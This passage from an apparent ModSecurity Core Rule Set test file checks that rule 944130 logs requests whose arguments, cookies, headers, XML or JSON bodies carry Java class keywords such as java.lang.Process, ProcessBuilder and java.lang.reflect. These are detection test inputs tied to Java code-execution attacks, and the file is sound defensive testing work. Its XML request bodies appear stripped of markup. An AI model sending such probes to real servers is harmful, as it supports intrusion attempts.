stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Number" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-293 - desc: "Nested XML element value includes keyword java.lang.Number" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Number" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-294 - desc: "Content-Type text/plain includes keyword java.lang.Number" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.Number" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-295 - desc: "Content-Type application/json arg value includes keyword java.lang.Number" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Number\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-296 - desc: "Content-Type application/json arg name includes keyword java.lang.Number" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.lang.Number\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-297 - desc: "Argument test includes keyword java.lang.Object" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.Object" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-298 - desc: "Argument name includes keyword java.lang.Object" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Object=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-299 - desc: "Cookie test includes keyword java.lang.Object" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Object - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-300 - desc: "Cookie name includes keyword java.lang.Object" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Object=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-301 - desc: "Request header test includes keyword java.lang.Object" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Object - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-302 - desc: "XML attribute value includes keyword java.lang.Object" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-303 - desc: "XML element value includes keyword java.lang.Object" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Object" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-304 - desc: "Nested XML element value includes keyword java.lang.Object" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Object" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-305 - desc: "Content-Type text/plain includes keyword java.lang.Object" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.Object" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-306 - desc: "Content-Type application/json arg value includes keyword java.lang.Object" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Object\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-307 - desc: "Content-Type application/json arg name includes keyword java.lang.Object" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.lang.Object\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-308 - desc: "Argument test includes keyword java.lang.Process" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.Process" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-309 - desc: "Argument name includes keyword java.lang.Process" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Process=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-310 - desc: "Cookie test includes keyword java.lang.Process" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Process - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-311 - desc: "Cookie name includes keyword java.lang.Process" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Process=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-312 - desc: "Request header test includes keyword java.lang.Process" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Process - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-313 - desc: "XML attribute value includes keyword java.lang.Process" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-314 - desc: "XML element value includes keyword java.lang.Process" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Process" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-315 - desc: "Nested XML element value includes keyword java.lang.Process" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Process" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-316 - desc: "Content-Type text/plain includes keyword java.lang.Process" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.Process" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-317 - desc: "Content-Type application/json arg value includes keyword java.lang.Process" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Process\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-318 - desc: "Content-Type application/json arg name includes keyword java.lang.Process" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.lang.Process\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-319 - desc: "Argument test includes keyword java.lang.ProcessBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-320 - desc: "Argument name includes keyword java.lang.ProcessBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.ProcessBuilder=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-321 - desc: "Cookie test includes keyword java.lang.ProcessBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.ProcessBuilder - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-322 - desc: "Cookie name includes keyword java.lang.ProcessBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.ProcessBuilder=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-323 - desc: "Request header test includes keyword java.lang.ProcessBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.ProcessBuilder - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-324 - desc: "XML attribute value includes keyword java.lang.ProcessBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-325 - desc: "XML element value includes keyword java.lang.ProcessBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-326 - desc: "Nested XML element value includes keyword java.lang.ProcessBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-327 - desc: "Content-Type text/plain includes keyword java.lang.ProcessBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-328 - desc: "Content-Type application/json arg value includes keyword java.lang.ProcessBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.ProcessBuilder\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-329 - desc: "Content-Type application/json arg name includes keyword java.lang.ProcessBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.lang.ProcessBuilder\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-330 - desc: "Argument test includes keyword java.lang.reflect" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.reflect" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-331 - desc: "Argument name includes keyword java.lang.reflect" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.reflect=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-332 - desc: "Cookie test includes keyword java.lang.reflect" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.reflect - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-333 - desc: "Cookie name includes keyword java.lang.reflect" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.reflect=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-334 - desc: "Request header test includes keyword java.lang.reflect" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.reflect - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-335 - desc: "XML attribute value includes keyword java.lang.reflect" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-336 - desc: "XML element value includes keyword java.lang.reflect" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.reflect" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-337 - desc: "Nested XML element value includes keyword java.lang.reflect" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.reflect" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-338 - desc: "Content-Type text/plain includes keyword java.lang.reflect" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 